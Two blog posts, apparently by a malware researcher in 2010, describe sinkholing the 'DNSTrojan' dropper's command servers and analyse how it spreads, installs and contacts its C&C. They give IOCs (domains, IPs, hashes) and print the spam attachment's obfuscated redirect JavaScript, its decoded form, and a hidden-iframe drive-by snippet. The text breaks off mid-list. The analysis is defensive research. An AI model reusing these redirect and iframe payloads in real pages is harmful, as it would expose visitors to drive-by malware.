# Mitigating the DNSTrojan Threat

A few days ago I’ve published a short analysis of a Trojan dropper which I call DNSTrojan (see New Dropper Uses DNS To Communicate). During this week I’ve tried to mitigate the threat by nuking at least some of the DNSTrojan C&C domain names by pointing them to my sinkhole.

In the first attempt I was able to redirect the traffic of the C&C servers to my sinkhole for around 9 hours. Afterwards the cybercriminals propagated a new C&C domain to the infected clients using httpdsconfig.com (the infected clients regularly contacting httpdsconfig.com using DNS to receive a list of C&C domains they should use).

A few hours later I was able to sinkhole the new domain name as well. Below is a chart showing the number of Apache handlers during the time the domain names have pointed to the sinkhole:

As you can see, the sinkhole had a huge server load. In totally, the C&C traffic has been redirected to my sinkhole for 10 hours. During this time I was able to count 23’000 unique IPs hitting the sinkhole. So I estimate the botnet size to 35k-50k unique IPs per day. This seems to be a huge number but in fact this isn’t a really BIG botnet (let’s compare: recently I was able to monitor a botnet which had a size of over 320’000 unique IPs per day).

Below is a chart which shows the botnet Geo location of the Trojan:

During the sinkhole action I was confronted with a unexpected problem: The botnet size wasn’t a problem but the fact that each bot queries the C&C every 30 seconds struggled my server into some performance problems. As you can see on the chart above, it ended with a downtime of the sinkhole server. In cooperation with Shadowserver I’ve now moved the domain names over to the Shadowservers sinkhole which should be able to handle that amount of requests easily.

In the last blog post I’ve published a list of C&C domains which are associated with the Trojan. Below is a updated list with additional domain names which I’ve came across so fare:

counterslocal.com
httpdsconfig.com
httpsquer.com
httpconfig.com
httpsbee.in
httpsgate.in
httpsget.in
httpsport.in
httpssite.in
httpson.in
httpsone.in
httpssresrun.com
httpssun.in
httpstatsconfig.com
httpsxy.in
httpszero.in
newsafetyplace.com
securitysoftwaretechltd2010.com

Another interesting find which I’ve made during the sinkholing action is that the cybercriminals are obviously using some kind of monitoring server. They periodically calling a PHP file called check.php on the C&C domain names to check whether the servers are still accessible:

95.143.192.14 “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18”
94.75.197.209 “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18” “

The two monitoring servers are located in Sweden and the Netherlands:

AS number: AS49770
AS name: SERVERCONNECT-AS ServerConnect Sweden AB
Country: Sweden

AS number: AS16265
AS name: LEASEWEB AS
Country: Netherlands

If we put the things together we can draw the following picture:

As shown above, the C&C servers are obviously just acting as nginx proxies which are redirecting the to the real mothership (which is currently unknown). Here is the list of nginx proxies which I’ve identified so far:

69.197.147.186 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.187 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.188 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.189 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.190 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.186 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.187 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.188 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.190 | US | AS32097 | WII-KC – WholeSale Internet, Inc.

Let’s see where they are moving to during the next few days…

# New Dropper Uses DNS To Communicate

During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).

I’ve first seen the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most of the AV-vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As fare as what I have seen is that this Trojan is just a dropper which drops additional Fake-AV software.

Back in june when I first saw the Trojan I’ve added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I’ve saw dozends domain names popping up which are being used to spread the Trojan (using Drive-By exploits). Here are some of them:

hezhett.co.cc
hezhexh.co.cc
hezhlhe.co.cc
hezhthu.co.cc
hezlhez.co.cc
hezlhhh.co.cc
hhehshe.co.cc
hheuhhh.co.cc
hhezhez.co.cc
hutahhe.co.cc
hzthezh.co.cc
scaner-ap.cz.cc
scaner-as.cz.cc
scaner-anti.cz.cc
scaner-all.cz.cc
scaner-ac2.cz.cc
scaner-access.cz.cc
scaner-acea.cz.cc
scaner-aced.cz.cc
scaner-acef.cz.cc
scaner-acer.cz.cc
scaner-dual.cz.cc
scaner-fast.cz.cc
scaner-g.cz.cc
scaner-gammi.cz.cc
scaner-go.cz.cc
scaner-h.cz.cc
scaner-hello.cz.cc
scaner-high.cz.cc
scaner-i.cz.cc
scaner-idea.cz.cc
scaner-internet.cz.cc
scaner-ip.cz.cc

As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

desktopsecurity2010soft.com
desktopsecuritycorp.com
desktopsecurityorg.com
desktopsecuritysoft2010.com
desktopsecuritysolution.com
desktopsecuritytech2010.com
securitysoftware2010tech.com
securitysoftwaretech2010ltd.com

*** Spam Mails propagating the DNSTrojan ***

This week I’ve found dozens of Spam mails in my honey pots which have had a HTML file attached. Some of the subject I’ve seen so far are:

• Consultation Appointment
• Questions
• Outstanding invoice – 9386 Ltd
• Nivea commercial payment
• Appraisal – Killington $155000 • Re: GO HOME + SHE SAID / 4.3.2.1./ • Transaction Breakdown • Offer on Killington • Fwd: Addendum to extend close of escrow! • Signatures to Intercreditor • demands for payment • Mortgage Breakdown PITI • notes from last week • and many more… The HTML files which are attached to all those spam mails contains JavaScript code: <script type='text/javascript'> <!-- var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m);//--> </script>  Hum? Obfuscated JavaScript code. If we decode it the following HTML code appears: <meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" /> The JavaScript coded embedded in the malicious attachment are redirecting the victim to a hijacked website which displays the following message in the web browser: For now I’ve seen the following hijacked websites involved in this spam campaign: blacklefilm.com/x.html chautoy.co.za/x.html numerouno-india.com/x.html universelles.com/x.html gvperkins.com/x.html nobletree.org/x.html turksagliksen.org.tr/x.html acquaintive.in/x.html hesswoodrecycling.com/x.html equus-ing.com.ar/x.html barrhavenbia.ca/x.html annechristene.com/x.html www.mindconnect.nl/x.html meltemtvreklam.com/x.html cernoma.com/x.html chautoy.co.za/x.html firstchurchofgodkokomo.org/x.htm euroiris.cz/x.html The hijacked website tries to do two things: 1. Install the ZeuS Banking Trojan using drive-By exploits (See AMaDa) 2. Redirect the victim once again to site which is controlled by the cybercriminals to distribute DNSTrojan The HTML source code of the hijacked websites (x.html) looks like this: <meta http-equiv="refresh" content="4;url=http://lausakizse.cz.cc/scanner10/?afid=24" /> <iframe width="0" height="0" src="http://wedubud.co.cc/ajax/?db=img&showtopic=11ss&last=redirect& [...]"></iframe> Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to assure the victim that his computer is infected with malware and offers him a malicious EXE-file: The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by the most AV-vendors: Filename: antivirus.exe File size : 169984 bytes MD5 : a00b75b0d43702d4b099548b90c715c7 SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8 VT: 33 /43 (76.7%) As of 2010-09-21 19:00 UTC, the spam campaign is still going on. *** The DNSTrojan *** Let take a closer look at the Trojan which is being dropped: The Trojan installs itself into the following directories: c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe c.\program files\common files\microsoft shared\TextConv\quillmsconv97.exe Note that the file names used by the Trojan varies. Additionally the Trojan has a interesting behavior when Apple Quick Time is installed on the victims computer: He will install itself into the Quick Time directory: c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe c.\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe In a next step the Trojan contacts its first Command&Control Server which is located at httpdsconfig.com. But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage: Standard query TXT 1284891734.httpdsconfig.com Standard query response TXT The Trojan is doing a DNS TXT query to httpdconfig.com every few minutes by using the current UNIX timestamp as subdomain (*unixtimestamp*.httpdsconfig.com).The C&C server replies with a encrypted string (seems to be always the same):$ dig 1284215737.httpdsconfig.com TXT +short
“a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737
efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec9
1caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c
205c87f5e93f7a5323e71e35d566fe9fc8916717f69304”

Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and will contact a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in

The C&C server will answer with a HTTP 404 (Not found) but the response also contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:

Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

*encrypted-data*

Last but not least the Trojan query a third C&C server located at httpsbee.in every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in

Note that the p string is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

• The Trojan is pretty new (first see in June 2010)
• The detection rate on the Trojan binaries is currently pretty good
• The Trojan uses DNS and HTTP to communicate with the C&C
• The Trojan dropps Fake-AV software (using “getfile.php”)

I recommend you to block the access to the following domain names which are associated with DNSTrojan:

httpdsconfig.com (204.12.223.190 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in –